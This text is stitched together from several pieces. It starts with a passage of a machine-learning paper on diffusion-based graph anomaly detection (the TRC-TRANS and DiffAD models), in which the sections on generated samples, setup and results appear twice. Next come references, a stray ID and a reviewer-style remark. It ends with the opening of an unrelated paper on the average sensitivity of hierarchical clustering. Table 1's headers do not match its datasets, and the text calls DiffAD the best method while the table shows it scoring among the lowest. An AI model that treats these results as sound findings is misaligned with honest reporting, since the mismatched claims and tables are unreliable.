\[ h_i^{TR} = \text{READOUT}\left[\cup_{t \in [0,T]} g(G_{i,t,:}; \theta_g)\right], \quad h_i^{TR} \in \mathbb{R}^d, \] (11)
where \( g(\cdot; \theta_g) \) is the function encoding \( G_{i,t,:} \), and READOUT(\(\cdot\)) fuses the information from all diffusion steps to extract the trajectory representation \( h_i^{TR} \). We propose TRC-TRANS and TRC-MLP to implement both functions. In TRC-TRANS, we adopt the raw Transformer architecture and generate the trajectory representation by passing \( G_{i,:,:} \) through the self-attention module (ATTN) and the position-wise feed-forward network (FFN):
\[ \text{ATTN}(\tilde{G}_{i,:,:}) = \text{SOFTMAX}\left(\frac{Q_iK_i^\top}{\sqrt{k}}\right)V_i, \quad h_i^{TR} = \text{READOUT}\{\text{FFN}[\text{ATTN}(\tilde{G}_{i,:,:})]\}, \] (12)
with
\[ Q_i = \tilde{G}_{i,:,:}W_Q, \quad K_i = \tilde{G}_{i,:,:}W_K, \quad V_i = \tilde{G}_{i,:,:}W_V, \] (13)
where \( W_Q, W_K, \) and \( W_V \in \mathbb{R}^{k \times k} \) are the projection matrices for \( Q, K, \) and \( V \), respectively, and \( \tilde{G}_{i,:,:} \) is \( v_i \)'s 2-D slice after adding the position encoding (Eq. (48)). The READOUT function is a fully connected layer. Ultimately, trajectory-representation-based classification is performed through the classifier in Eq. (9), replacing \( h_0^i \) with \( h_i^{TR} \), and the whole model is trained by minimizing Eq. (10). Due to space limitations, we provide details of the readout function and present an even more straightforward yet effective MLP-based model in Appendix E.
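A minimal PyTorch sketch (ours) of a TRC-TRANS-style encoder; since the exact readout is deferred to Appendix E, the mean-then-linear readout below is an assumption made for illustration:

```python
import torch
import torch.nn as nn

class TRCTrans(nn.Module):
    """Single-head self-attention over diffusion steps (Eqs. (12)-(13)),
    followed by an FFN and a simple (assumed) mean + linear readout."""
    def __init__(self, k, d):
        super().__init__()
        self.WQ = nn.Linear(k, k, bias=False)
        self.WK = nn.Linear(k, k, bias=False)
        self.WV = nn.Linear(k, k, bias=False)
        self.ffn = nn.Sequential(nn.Linear(k, d), nn.ReLU(), nn.Linear(d, k))
        self.readout = nn.Linear(k, d)          # fully connected readout
        self.head = nn.Linear(d, 2)             # classifier of Eq. (9)

    def forward(self, G):                       # G: (n, T, k), position-encoded
        Q, K, V = self.WQ(G), self.WK(G), self.WV(G)
        attn = torch.softmax(Q @ K.transpose(-2, -1) / G.shape[-1] ** 0.5, dim=-1)
        h = self.readout(self.ffn(attn @ V).mean(dim=1))   # trajectory repr.
        return self.head(h)
```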
6 OUR APPROACH II - GENERATIVE GRAPH ANOMALY DETECTION

Motivated by the success of generative models in synthesizing high-quality data samples, we propose a novel DDPM-based graph diffusion model (namely DiffAD) to generate auxiliary training samples and complement detectors for more effective anomaly detection.

6.1 REVERSE PROCESS FOR DATA DISTRIBUTION MODELING

Let \( \{G_t\}_{t=0}^T \) denote the sequence of noised graphs in the forward graph diffusion process, where each \( G_t = \{A, X_t\} \) and \( X_t \sim q(X_t | X_{t-1}, A) = N(X_t; \sqrt{\alpha_t}X_{t-1}, (1 - \alpha_t)I) \), with \( \alpha_t = 1 - \beta_t \) (detailed in §5.1). Our goal is to learn the original graph data distribution through the reverse process, which in practice amounts to learning a denoising network in accordance with Eq. (3):
\[ \theta^* = \arg\min_\theta D_{KL}[q(X_{t-1} | X_t, X, A) \| p_\theta(X_{t-1} | X_t, A)]. \] (14)
Given that the node attributes of the corrupted graph at each forward step \( t \) follow the distribution \( N(X_t; \sqrt{\alpha_t}X_{t-1}, (1 - \alpha_t)I) \), learning \( \theta^* \) via Eq. (14) amounts to estimating the mean \( \sqrt{\alpha_t}X_{t-1} \) and variance \( (1 - \alpha_t)I \) of the previous step \( t-1 \) using graph \( G_t \) (detailed in Appendix G). Upon our design Principle II (§4.3), which advises that the denoising network should recover the low-frequency signals, we opt for the graph convolutional network (GCN) (Kipf & Welling, 2017) as the backbone because of its capacity to act as a low-pass filter, attenuating high-frequency signals and emphasizing lower frequencies (Nt & Maehara, 2019; Keriven, 2022). From the spatial perspective, the GCN inherently explores the local graph semantics, which aligns with Principle I. Our proposed model DiffAD has two ingredients: a step-dependent GCN (SDN) for learning node representations \( Z_t \) at step \( t \), and a distribution-estimating GCN (DEN) for estimating the distribution (mean and variance) of \( X_{t-1} \).

6.1.1 STEP-DEPENDENT GCN - SDN

Built on Kipf & Welling (2016), we assume that the latent node representations also follow a Gaussian distribution, \( p(Z_t | X_t, A, t) \sim N(\mu_{SDN}^t, \text{diag}(\Sigma_{SDN}^t)) = \prod_{i=1}^n p(z_i^t | X_t, A, t) \), with \( p(z_i^t | X_t, A, t) = N(z_i^t; \mu_{i,t}, \sigma_{i,t}^2) \). The matrices \( \mu_{SDN}^t \) and \( \text{diag}(\Sigma_{SDN}^t) \) collect the mean and variance vectors \( (\mu_{i,t}, \sigma_{i,t}^2) \) of the node representations \( z_i^t \) at step \( t \), which are generated by:
\[ \mu_{SDN}^t = \text{SDN}_\mu(X_t, A, t) = \tilde{A} \text{ReLU}[\tilde{A}(X_t + TE(t))W_1^{SDN}]W_2^{SDN}, \] (15)
\[ \log[\text{diag}(\Sigma_{SDN}^t)] = \text{SDN}_\sigma(X_t, A, t) = \tilde{A} \text{ReLU}[\tilde{A}(X_t + TE(t))W_1^{SDN}]W_3^{SDN}, \] (16)
where \( \tilde{A} = D^{-\frac{1}{2}}AD^{-\frac{1}{2}} \) is the normalized adjacency matrix, and \( W_1^{SDN}, W_2^{SDN}, W_3^{SDN} \) are the GCN layer parameters. \( \text{SDN}_\mu \) and \( \text{SDN}_\sigma \) share the first layer, parametrized by \( W_1^{SDN} \). We incorporate the diffusion step \( t \) into the learning process by encoding it as a matrix via \( TE(\cdot) \) (see Appendix F).

6.1.2 DISTRIBUTION-ESTIMATING GCN - DEN

We then propose DEN for predicting the less-noisy node attributes \( X_{t-1} \) from \( Z_t \). Empirically, this amounts to estimating the mean and variance of \( X_{t-1} \) (in Eq. (5)), which we obtain by
\[ p(X_{t-1} | Z_t, \tilde{Z}_t, A) \sim N(\mu_{DEN}^{t-1}, \text{diag}(\Sigma_{DEN}^{t-1})) := \prod_{i=1}^n p(x_i^{t-1} | z_i^t, \tilde{z}_i^t, A), \] (17)
with \( p(x_i^{t-1} | z_i^t, \tilde{z}_i^t, A) = N(x_i^{t-1}; \mu_{i,t-1}, \sigma_{i,t-1}^2) \), where \( \tilde{z}_i^t \in \tilde{Z}_t \) is the output of the first GCN layer in SDN. We pass this residual information from SDN to prevent oversmoothing and further validate its effectiveness through the ablation study in Appendix J. Notably, unlike in SDN, the matrices \( \mu_{DEN}^{t-1} \) and \( \text{diag}(\Sigma_{DEN}^{t-1}) \) collect the mean vectors \( \mu_{i,t-1} \) and variances \( \sigma_{i,t-1}^2 \) of \( x_i^{t-1} \) to describe the distribution of \( X_{t-1} \); they are learned through a two-layer GCN similar to SDN as follows:
\[ \mu_{DEN}^{t-1} = \text{DEN}_\mu(Z_t, \tilde{Z}_t, A) = \tilde{A} \{\text{ReLU}[\tilde{A}(Z_t \oplus \tilde{Z}_t)W_1^{DEN}] \oplus \tilde{Z}_t\} W_2^{DEN}, \] (18)
\[ \log[\text{diag}(\Sigma_{DEN}^{t-1})] = \text{DEN}_\sigma(Z_t, \tilde{Z}_t, A) = \tilde{A} \{\text{ReLU}[\tilde{A}(Z_t \oplus \tilde{Z}_t)W_1^{DEN}] \oplus \tilde{Z}_t\} W_3^{DEN}, \] (19)
where \( \oplus \) denotes concatenation and \( W_1^{DEN}, W_2^{DEN}, W_3^{DEN} \) parameterize the GCN layers.
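A minimal PyTorch sketch (ours) of the step-dependent two-branch GCN pattern of Eqs. (15)-(16); the learned-embedding form of \( TE(t) \) is an assumption, as the paper's encoding is specified in Appendix F:

```python
import torch
import torch.nn as nn

class StepGCN(nn.Module):
    """Two GCN branches with a shared first layer, predicting the mean and
    log-variance at diffusion step t (cf. Eqs. (15)-(16))."""
    def __init__(self, k, d, T):
        super().__init__()
        self.time_embed = nn.Embedding(T, k)     # assumed parametrization of TE(t)
        self.W1 = nn.Linear(k, d, bias=False)    # shared first GCN layer
        self.W_mu = nn.Linear(d, d, bias=False)
        self.W_sigma = nn.Linear(d, d, bias=False)

    def forward(self, A_norm, Xt, t):            # A_norm: normalized adjacency
        H = torch.relu(A_norm @ self.W1(Xt + self.time_embed(t)))
        mu = A_norm @ self.W_mu(H)               # Eq. (15)
        log_var = A_norm @ self.W_sigma(H)       # Eq. (16)
        return mu, log_var

sdn = StepGCN(k=8, d=16, T=1000)
mu, log_var = sdn(torch.eye(5), torch.randn(5, 8), torch.tensor(10))
```

DEN follows the same pattern, with the concatenated inputs \( Z_t \oplus \tilde{Z}_t \) of Eqs. (18)-(19) in place of \( X_t + TE(t) \).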
6.1.3 SIMPLIFIED TRAINING OBJECTIVE OF THE REVERSE PROCESS

Eventually, all parameters \( \theta = \{W_i^{SDN}\}_{i=1}^{3} \cup \{W_i^{DEN}\}_{i=1}^{3} \cup \{W_i^{TE}\}_{i=1}^{2} \) can be promptly fine-tuned with regard to Eq. (14) at each diffusion step. As with the simplified training objective of DDPM, our training objective can be reformulated as predicting the added noise:
\[ \theta^* = \arg \min_{\theta} \mathbb{E}_{X,\epsilon}(\|\epsilon - \epsilon_\theta\|_2^2), \] (20)
where \( \epsilon_\theta \) is the predicted noise. Due to space limitations, we provide details in Appendix G.

6.2 GRAPH GENERATION

Once the whole model is sufficiently trained, we can simply sample \( X_T \) from \( \mathcal{N}(0, I) \) and generate a new graph \( G_a \) by reversing the \( T \)-step forward diffusion (Eq. (2)) following:
\[ X_{t-1} = \frac{1}{\sqrt{\alpha_t}} \left( X_t - \frac{1 - \alpha_t}{\sqrt{1 - \bar{\alpha}_t}} \epsilon_\theta(X_t, A, t) \right) + \sigma_t \epsilon^*, \] (21)
where \( \epsilon^* \sim \mathcal{N}(0, I) \) and \( \sigma_t^2 = \frac{1 - \bar{\alpha}_{t-1}}{1 - \bar{\alpha}_t} \beta_t \). The generated sample can then be utilized as auxiliary data to enhance anomaly detectors. The full algorithms are summarized in Appendices H and I.

6.3 GRAPH ANOMALY DETECTION WITH GENERATED SAMPLES

Given a set of generated graphs \( G_a = \{G_a^1, \ldots, G_a^{|G_a|}\} \) and the original graph \( G \), we train a two-layer GCN classifier (see Appendix F) by reformulating the class-wise objective in Eq. (10) to incorporate the training signals from the generated graphs:
\[ L = - \sum_{y \in \{0, 1\}} \sum_{v_i \in V_y} \frac{1}{|V_y|} \left[ \log \psi(v_i | y) + \frac{1}{|G_a|} \sum_{g=1}^{|G_a|} \log \psi(v_i^g | y) \right], \] (22)
where \( \psi(v_i^g | y) \) predicts the probability of node \( v_i^g \) being anomalous or normal.

7 EXPERIMENTS

7.1 EXPERIMENTAL SETUP

The nine graph anomaly detection datasets fall into two groups: one with organic anomalies, including YelpChi (Rayana & Akoglu, 2015), Reddit (Wang et al., 2021a), Weibo (Zhao et al., 2020), Tfinance, Tolokers, and Questions (Tang et al., 2023); and another with injected anomalies, including BlogCatalog (Ding et al., 2019), ACM (Ding et al., 2019), and Cora (Liu et al., 2022b). Our methods are compared against three GNN detectors built upon GCN (Kipf & Welling, 2017), GAT (Veličković et al., 2018), and GraphSAGE (Hamilton et al., 2017); seven state-of-the-art semi-/supervised anomaly detectors: GeniePath (Liu et al., 2019), FdGars (Wang et al., 2019), BWGNN (Tang et al., 2022), DAGAD (Liu et al., 2022a), GAT-sep (Zhu et al., 2020), AMNet (Chai et al., 2022), and GHRN (Gao et al., 2023a); and two contrastive detectors, namely CONAD (Xu et al., 2022b) and CoLA (Liu et al., 2021). We use a training ratio of 20% and report the 5-fold average performance (in percentage) along with the standard deviation using four commonly used metrics: Macro-F1, Macro-Precision, Macro-Recall, and AUC (Ma et al., 2021). More details of the datasets and baselines can be found in Appendix J.

7.2 ANOMALY DETECTION PERFORMANCE

From the results in Tables 1 and 4 (Appendix J), we see that DiffAD achieves the best results on almost all datasets. This confirms the validity of our second recipe: synthesized graphs can complement anomaly detectors to better distinguish anomalies, thereby mitigating the shortage of labeled data.

Table 1: Detection results on six datasets (best in bold).
### 6.3 Graph Anomaly Detection with Generated Samples

Given a set of generated graphs \( G_a = \{G_1^a, \ldots, G_{|G_a|}^a\} \) and the original graph \( G \), we then train a two-layered GCN classifier (see Appendix F) by reformulating the class-wise objective in Eq. (10) to involve the training signals from the generated graphs, which can be formulated as:

\[ L = - \sum_{y \in \{0, 1\}} \sum_{v_i \in V_y} \frac{1}{|V_y|} \left[ \log \psi(v_i | y) + \frac{1}{|G_a|} \sum_{g=1}^{|G_a|} \log \psi(v_i^g | y) \right], \] (22)

where \( \psi(v_i^g | y) \) predicts the probability of node \( v_i \) (or its generated counterpart \( v_i^g \)) being anomalous or normal.

### 7 Experiments

#### 7.1 Experimental Setup

The nine graph anomaly detection datasets can be categorized into two groups: one with organic anomalies, including YelpChi (Rayana & Akoglu, 2015), Reddit (Wang et al., 2021a), Weibo (Zhao et al., 2020), as well as Tfinance, Tolokers, and Questions (Tang et al., 2023); and another with injected anomalies (BlogCatalog (Ding et al., 2019), ACM (Ding et al., 2019), and Cora (Liu et al., 2022b)). Our methods are compared against three GNN detectors built upon GCN (Kipf & Welling, 2017), GAT (Veličković et al., 2018), and GraphSAGE (Hamilton et al., 2017); seven state-of-the-art semi-/supervised anomaly detectors: GeniePath (Liu et al., 2019), FdGars (Wang et al., 2019), BWGNN (Tang et al., 2022), DAGAD (Liu et al., 2022a), GAT-sep (Zhu et al., 2020), AMNet (Chai et al., 2022), and GHRN (Gao et al., 2023a); and two contrastive detectors, namely CONAD (Xu et al., 2022b) and CoLA (Liu et al., 2021). We use a training ratio of 20% and report the 5-fold average performance (in percentage) along with the standard deviation using four commonly used metrics: Macro-F1, Macro-Precision, Macro-Recall, and AUC (Ma et al., 2021). More details of the datasets and baselines can be found in Appendix J.

#### 7.2 Anomaly Detection Performance

From the results in Tables 1 and 4 (Appendix J), we see that DiffAD achieves the best results on almost all datasets. This confirms the validity of our second recipe: synthesized graphs can complement anomaly detectors to better distinguish anomalies, thereby mitigating the shortage of labeled data.

Table 1: Detection results on six datasets (best in bold).

| Method | YelpChi | Reddit | Weibo | BlogCatalog | ACM | Cora |
|--------------|---------|--------|-------|-------------|-----|------|
| | M-F1 | AUC | M-F1 | AUC | M-F1 | AUC |
| GAT | 46.08±0.1 | 57.90±0.1 | 49.20±0.1 | 57.74±0.1 | 85.32±0.1 | 85.64±0.1 |
| GraphSAGE | 60.86±0.2 | 80.36±0.1 | 49.15±0.1 | 51.31±0.2 | 89.20±0.1 | 88.35±0.2 |
| GeniePath | 46.08±0.1 | 48.74±0.1 | 49.15±0.1 | 46.30±0.1 | 55.06±1.7 | 62.94±1.4 |
| FdGars | 49.77±0.1 | 53.01±0.5 | 48.52±0.2 | 61.05±0.1 | 87.65±0.1 | 93.11±0.6 |
| BWGNN | 52.08±0.2 | 59.83±0.1 | 49.15±0.1 | 61.49±0.3 | 89.63±0.1 | 91.05±0.1 |
| DAGAD | 65.93±0.3 | 80.01±0.3 | 49.16±0.1 | 50.22±0.5 | 91.92±0.2 | 95.71±0.1 |
| GAT-sep | 65.59±0.1 | 81.92±0.1 | 45.60±0.3 | 66.09±0.4 | 99.26±0.1 | 91.78±0.2 |
| AMNet | 47.42±0.1 | 47.50±0.2 | 46.39±0.1 | 55.74±0.2 | 79.01±0.1 | 90.40±0.1 |
| GHRN | 55.36±0.1 | 55.84±0.1 | 48.88±0.1 | 57.33±0.1 | 98.11±0.1 | 98.49±0.1 |
| CONAD | 55.36±0.1 | 75.64±0.1 | 50.23±0.1 | 58.41±0.0 | 90.75±0.1 | 95.80±0.1 |
| CoLA | 56.58±0.1 | 72.83±0.2 | 48.21±0.2 | 57.1±0.1 | 92.06±0.1 | 98.17±0.1 |
| TRC-MLP | 73.88±0.1 | 97.94±0.1 | 51.85±0.1 | 72.20±0.1 | 90.54±0.1 | 95.48±0.5 |
| DiffAD | 52.68±0.1 | 51.15±0.1 | 59.43±0.1 | 50.15±0.2 | 70.15±0.2 | 67.40±0.2 |

While DAGAD also aims to enhance performance through data augmentation, it primarily focuses on combining class-biased features and cannot generate auxiliary training samples. GeniePath, FdGars, and BWGNN only investigate anomalies' patterns by proposing new graph signal filtering algorithms or by constructing discriminating features from the raw data. They ignore the challenges imposed by the scarcity of anomalies and thus obtain compromised results. The performance of the three GNN detectors reveals the power of these vanilla GNN backbones, but they still suffer from the oversmoothing problem of MP-GNNs (as described in §1).

Our non-GNN methods (i.e., FSC, TRC-MLP, and TRC-TRANS), which are built in accordance with the new graph anomaly detection paradigm (first recipe), obtain the top-3 performance on the Weibo dataset. We attribute this to the significantly lower feature similarity between anomalies and normal nodes (0.004 vs. 0.993) (Liu et al., 2022b), which makes anomalies' trajectories easier to distinguish from those of normal nodes. The competitive results on the other datasets demonstrate that this paradigm is worth further exploration.

#### 7.3 Case Study I - The Efficacy of Generated Graphs

We further investigate the effectiveness of our generated graphs in enhancing other state-of-the-art detectors by feeding them as additional training samples. For fairness, we generate one graph using DiffAD and reformulate the existing detectors' objectives (similar to Eq. (22)) to incorporate the training signals from the generated graph. We select two real-world datasets, namely YelpChi and Reddit, and report the improved performance and growth rate (in brackets) on M-F1 and AUC in Table 2. As can be seen, the additional graph samples can improve the performance of the existing detectors to different degrees. This empirically demonstrates that the additional samples synthesized by DiffAD provide complementary information about anomalies, leading to boosted performance. We also notice that such improvement is dependent on the detectors. We attribute this to the varying capabilities of each method in learning the data distribution and assimilating synthetic information.
We report additional experiments exploring the impact of the generated graphs, key parameters, and the skip-step algorithm, as well as an ablation study, in Appendix J.

### 8 Conclusion

We offer two fresh recipes for graph anomaly detection based on our scrutiny of the forward diffusion process. We discover that anomalies can be distinguished by their distinct dynamics in the diffusion process (first recipe), and that the denoising network for generating auxiliary training data (second recipe) needs to be capable of recovering low-frequency signals. Building on these findings, we design three non-GNN methods and a generative graph diffusion model to detect anomalies. Our methods deliver record-breaking performance across nine widely used datasets with merely 20% of labeled data, and our generated graphs also significantly boost other detectors' performance.

Table 2: Performance improvement brought by generated graphs.

| Method | YelpChi | Reddit |
|--------------|---------|--------|
| | M-F1 | AUC | M-F1 | AUC |
| GAT | 72.68±0.1 | 86.70±0.1 | 51.42±0.1 | 66.33±0.2 |
| GraphSAGE | 74.21±0.1 | 87.51±0.1 | 52.29±0.1 | 67.90±0.2 |
| GeniePath | 51.67±0.1 | 59.43±0.1 | 50.15±0.2 | 70.15±0.2 |
| FdGars | 55.74±0.1 | 68.27±0.1 | 48.55±0.1 | 64.03±0.1 |
| BWGNN | 64.88±0.2 | 81.06±0.1 | 47.69±0.1 | 70.31±0.1 |
| DAGAD | 53.71±0.3 | 60.11±0.1 | 52.81±0.3 | 69.28±0.1 |
| GAT-sep | 60.15±0.1 | 61.69±0.1 | 51.15±1.8 | 67.52±0.3 |
| AMNet | 61.45±0.3 | 86.32±0.1 | 47.53±0.3 | 72.59±0.2 |
| GHRN | 69.36±0.2 | 86.32±0.1 | 49.15±0.1 | 57.23±0.1 |
| CONAD | 52.68±0.1 | 50.32±0.1 | 47.04±0.1 | 51.53±0.1 |
| CoLA | 46.14±0.2 | 65.42±0.1 | 47.04±0.1 | 51.53±0.1 |

REFERENCES

Leman Akoglu. Anomaly mining: Past, present and future. In CIKM, pp. 1–2, 2021.

Leman Akoglu, Hanghang Tong, and Danai Koutra. Graph based anomaly detection and description: A survey. Data Min. Knowl. Disc., 29:626–688, 2015.

Mehdi Azabou, Venkataramana Ganesh, Shantanu Thakoor, Chi-Heng Lin, Lakshmi Sathidevi, Ran Liu, Michal Valko, Petar Veličković, and Eva L Dyer. Half-Hop: A graph upsampling approach for slowing down message passing. In ICML, pp. 1341–1360, 2023.

Ziwei Chai, Siqi You, Yang Yang, Shiliang Pu, Jiarong Xu, Haoyang Cai, and Weihao Jiang. Can abnormality be detected by graph neural networks? In Proceedings of the Thirty-First International Joint Conference on Artificial Intelligence, IJCAI-22, 2022.

Ines Chami, Sami Abu-El-Haija, Bryan Perozzi, Christopher Ré, and Kevin Murphy. Machine learning on graphs: A model and comprehensive taxonomy. J. Mach. Learn. Res., 23(89):1–64, 2022.

Dexiong Chen, Leslie O'Bray, and Karsten Borgwardt. Structure-aware transformer for graph representation learning. In ICML, pp. 3469–3489, 2022.

Peng Cui, Xiao Wang, Jian Pei, and Wenwu Zhu. A survey on network embedding. IEEE Trans. Knowl. Data Eng., 31(5):833–852, 2019.

Kaize Ding, Jundong Li, Rohit Bhanushali, and Huan Liu. Deep anomaly detection on attributed networks. In SDM, pp. 594–602, 2019.

Yingtong Dou, Zhiwei Liu, Li Sun, Yutong Deng, Hao Peng, and Philip S Yu. Enhancing graph neural network-based fraud detectors against camouflaged fraudsters. In CIKM, pp. 315–324, 2020.

Yuan Gao, Xiang Wang, Xiangnan He, Zhenguang Liu, Huamin Feng, and Yongdong Zhang. Addressing heterophily in graph anomaly detection: A perspective of graph spectrum. In Proceedings of the ACM Web Conference 2023, pp. 1528–1538, 2023a.

Yuan Gao, Xiang Wang, Xiangnan He, Zhenguang Liu, Huamin Feng, and Yongdong Zhang.
Alleviating structural distribution shift in graph anomaly detection. In Proceedings of the Sixteenth ACM International Conference on Web Search and Data Mining, pp. 357–365, 2023b. Dmitrii Gavrilev and Evgeny Burnaev. Anomaly detection in networks via score-based generative models. In ICML 2023 Workshop on Structured Probabilistic Inference & Generative Modeling, 2023. Ian Goodfellow, Yoshua Bengio, and Aaron Courville. Deep Learning, chapter Deep Feedforward Networks, pp. 163–220. MIT Press, Cambridge, MA, USA, 2016. Frank E Grubbs. Procedures for detecting outlying observations in samples. Technometrics, 11(1):1–21, 1969. William L. Hamilton, Rex Ying, and Jure Leskovec. Inductive representation learning on large graphs. In NeurIPS, pp. 1025–1035, 2017. Jonathan Ho, Ajay Jain, and Pieter Abbeel. Denoising diffusion probabilistic models. In NeurIPS, pp. 6840–6851, 2020. Sepp Hochreiter and Jürgen Schmidhuber. Long short-term memory. Neural Computation, 9(8):1735–1780, 1997. Han Huang, Leilei Sun, Bowen Du, Yanjie Fu, and Weifeng Lv. GraphGDP: Generative diffusion processes for permutation invariant graph generation. In ICDM, pp. 201–210, 2022. Bowen Jing, Gabriele Corso, Regina Barzilay, and Tommi S Jaakkola. Torsional diffusion for molecular conformer generation. In NeurIPS, pp. 24240–24253, 2022.
lCLdLlXAvt
The average sensitivity of SHC is $O(\lambda D n)$, which can be made small by setting $\lambda \ll 1$. In the experiments, this is not always the case, for instance in Section 8. This signifies that SHC in practice doesn't really have a low average sensitivity.
Average Sensitivity of Hierarchical Clustering

Anonymous authors
Paper under double-blind review

Abstract

Hierarchical clustering is one of the most popular methods used to extract cluster structures in a dataset. However, if the hierarchical clustering algorithm is sensitive to small perturbations of the dataset, then the credibility and replicability of the output hierarchical clustering are compromised. To address this issue, we consider the average sensitivity of hierarchical clustering algorithms, which measures the change in the output hierarchical clustering upon deletion of a random data point from the dataset. Then, we propose a divisive hierarchical clustering algorithm with which we can tune the average sensitivity. Experimental results on benchmark and real-world datasets confirm that the proposed method is stable against the deletion of a few data points, while existing algorithms are not.

1 Introduction

Hierarchical clustering is one of the most popular methods used to extract cluster structures in a dataset consisting of data points (Murtagh and Contreras, 2012b). This method partitions the data points into clusters by constructing a rooted tree whose leaves correspond to data points and whose internal nodes represent clusters. By tracing the hierarchy from the root to the leaves, we can extract interpretable knowledge from the dataset. For example, suppose that we have genomic data of single cells in a tissue. Then, the hierarchy can be used to figure out complex cellular states and tissue compositions (Zurauskienė and Yau, 2016). Hierarchical clusterings are also used in several applications such as phylogenetics (Eisen et al., 1998), geophysics (Takahashi et al., 2019), and social network analysis (Gilbert et al., 2011).

Because of the importance of hierarchical clustering, a plethora of hierarchical clustering algorithms have been proposed (Heller and Ghahramani, 2005; Jain, 2010; Hastie et al., 2009; Murtagh and Contreras, 2012b). These algorithms are mainly concerned with the quality of the output hierarchical clustering. However, there is another essential aspect that must not be overlooked: the stability of the output hierarchical clustering. Since the output is often used to understand the data structure, an algorithm needs to be stable under data perturbations as long as the data distribution remains intact. This requirement can be naturally formalized as a question using the notion of average sensitivity (Varma and Yoshida, 2021): given a random deletion of data points from the original dataset, how stable is the output hierarchical clustering? In the example of genomic data, a stable and reliable algorithm is expected to retain most of the tissue compositions found in the original data, even if a few cells are missing. However, in the example in Figure 1 and in the application to geophysics (Figure 3 in Section 8), we show that the existing algorithms are unstable under data point removals.

In this work, we propose a novel algorithm for hierarchical clustering that is stable against deletions of data points. We measure the stability of an algorithm using average sensitivity (Murai and Yoshida, 2019; Varma and Yoshida, 2021). Because the average sensitivity was originally defined for algorithms that output vectors or sets, we first formally define the average sensitivity of hierarchical clustering algorithms. Then, we propose a (randomized) algorithm that partitions the dataset in a top-down manner.
The proposed algorithm applies a randomized process called the exponential mechanism (McSherry and Talwar, 2007) when partitioning the dataset, and we theoretically prove that it has a small average sensitivity.

Figure 1 shows an illustrative example of sensitive/stable hierarchical clustering algorithms. In this example, the standard agglomerative method induces different hierarchies before and after one data point (the data point 4) is removed, as shown in the middle of the figure.

Figure 1: Examples of a dataset (top left) and its hierarchical clusterings output by an existing agglomerative algorithm using complete linkage (top middle) and the proposed one (top right), and a dataset obtained by removing the data point 4 (bottom left) and its hierarchical clusterings output by the existing agglomerative algorithm (bottom middle) and the proposed one (bottom right). The existing agglomerative clustering algorithm is sensitive to the removal of even a single data point. The proposed algorithm produces a more stable clustering. The red nodes in the trees on the right denote the changes from the trees on the left before the data removal.

This result indicates that the widely used agglomerative method is sensitive to the removal of data points. The objective of this study is to design a hierarchical clustering algorithm that is stable against the removal of a few data points, as shown at the bottom of the figure.

Randomized algorithms may output completely different hierarchical clusterings on the original dataset and on that obtained by deleting a random data point, even if the output distributions are close. To alleviate this issue, we design a (randomized) hierarchical clustering algorithm with low average sensitivity under shared randomness, which outputs similar hierarchical clusterings both on the original dataset and on the dataset obtained by deleting a random data point, with high probability over the choice of the random bits used.

We conduct comparisons between our proposed algorithm and existing algorithms on three benchmark datasets. In the experiments, we evaluated the trade-offs between the average sensitivity of the clustering algorithms and their clustering qualities. We observed that most of the existing algorithms exhibit high average sensitivity, indicating that their output can change drastically even upon the removal of a single data point. By contrast, the proposed algorithm can produce stable clustering results while maintaining the quality of clustering. We also applied the clustering algorithms to a real-world GPS dataset (Takahashi et al., 2019). The results on this dataset also confirm that the existing algorithms are sensitive to data deletion, while the proposed algorithm is not.

2 RELATED WORK

Hierarchical Clustering Algorithms for hierarchical clustering can be classified into agglomerative and divisive methods (Hastie et al., 2009). Given a dataset, an agglomerative method iteratively finds a pair of data points or clusters using a certain linkage criterion and merges them into a new cluster until all the data points are merged into a single cluster. As the linkage criterion, the single linkage, average linkage, and complete linkage rules are frequently used (Hastie et al., 2009; Murtagh and Contreras, 2012a). A divisive method constructs a hierarchy in a top-down manner. It recursively partitions a dataset into two sub-clusters until all the data points are partitioned or it reaches a prescribed tree depth (Jain, 2010).
Several extensions of the clustering algorithms have been considered: Abboud et al. (2019) and Moseley et al. (2021) considered improving the computational scalability; Ackerman et al. (2012) introduced a weighted version of the agglomerative methods; and Kimes et al. (2017) and Gao et al. (2022) introduced statistical tests for clustering. Theoretical aspects of hierarchical clustering have also been investigated: Dasgupta (2016) introduced a cost function for hierarchical clustering; Ackerman and Ben-David (2016) showed that the agglomerative methods have some desirable properties; and Roy and Pokutta (2016); Charikar and Chatziafratis (2017); Moseley and Wang (2017); Dhulipala et al. (2022) proposed methods with better approximation guarantees. We note that the focus of the studies above is on constructing hierarchies with better quality or more efficiency. The current study is orthogonal to them; our focus is on developing a hierarchical clustering algorithm that is stable against the deletion of a data point.

Robust Hierarchical Clustering There have been a few studies on hierarchical clustering algorithms that exhibit robustness against outlier injections (Eriksson et al., 2011; Balcan et al., 2014; Cheng et al., 2019), which is a distinct form of data perturbation compared to the current study. These studies aim to achieve consistent clustering results regardless of the presence of outliers by identifying the injected outliers. It is important to note that hierarchical clustering algorithms can be unstable even in the absence of outliers. As demonstrated in Figure 1, although the underlying data distribution does not change after deleting a data point, the clustering results can differ significantly. For reliable knowledge discovery, it is imperative that the algorithm remains stable under such natural perturbations of the data. However, this specific type of robustness has not yet been thoroughly explored, making our study the first to venture in this direction.

Average Sensitivity The notion of average sensitivity was originally introduced in Murai and Yoshida (2019) to compare network centralities in terms of their stability against graph perturbations. The notion was then extended to handle graph algorithms in Varma and Yoshida (2021). Since then, the average sensitivity of algorithms for various problems has been studied, including the maximum matching problem (Yoshida and Zhou, 2021), spectral clustering (Peng and Yoshida, 2020), Euclidean k-clustering (Yoshida and Ito, 2022), dynamic programming problems (Kumabe and Yoshida, 2022a,b), and decision tree learning (Hara and Yoshida, 2023).

3 PRELIMINARIES

We use bold symbols to denote random variables. For two random variables \( X \) and \( Y \) on a finite set \( E \), let \( d_{TV}(X, Y) := \sum_{e \in E} |\Pr[X = e] - \Pr[Y = e]|/2 \) denote the total variation distance between their distributions. For sets \( S \) and \( T \), let \( S \triangle T = (S \setminus T) \cup (T \setminus S) \) denote their symmetric difference.

3.1 Hierarchical Clustering

Let \( X = \{x_1, \ldots, x_n\} \) be a dataset. We always assume that the data points \( x_1, \ldots, x_n \) are distinct (otherwise we assign them unique IDs so that they are distinct). A hierarchical clustering over \( X \) is a rooted tree \( T \) such that each leaf corresponds to a subset of \( X \) and the subsets corresponding to the leaves form a partition of \( X \). Note that the hierarchical clusterings considered in this work do not always decompose \( X \) into individual data points.
